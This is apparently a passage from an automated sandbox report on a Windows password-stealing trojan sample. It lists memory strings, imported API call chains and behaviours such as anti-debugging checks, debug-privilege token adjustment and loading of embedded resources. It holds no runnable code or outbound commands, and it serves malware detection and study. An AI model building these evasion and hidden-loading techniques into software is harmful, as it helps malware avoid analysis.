                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269777182.00000000007D3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040ADB0 GetProcessHeap,HeapFree,1_2_0040ADB0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: GetLocaleInfoA,1_2_00417A20
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation